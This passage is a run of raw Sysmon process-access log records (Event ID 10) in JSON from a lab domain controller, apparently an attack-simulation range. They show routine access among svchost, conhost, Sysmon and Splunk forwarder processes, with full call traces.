06:53:59.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4541,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4542,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4543,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4544,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4545,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.896\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1187-5F25-0000-0010193A0600}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.896","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1187-5F25-0000-0010193A0600}","TargetProcessId":"5040","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4546,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.036\r\nSourceProcessGUID: {E2A3D6B1-1187-5F25-0000-0010193A0600}\r\nSourceProcessId: 5040\r\nSourceThreadId: 4832\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.036","SourceProcessGUID":"{E2A3D6B1-1187-5F25-0000-0010193A0600}","SourceProcessId":"5040","SourceThreadId":"4832","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4547,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4548,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
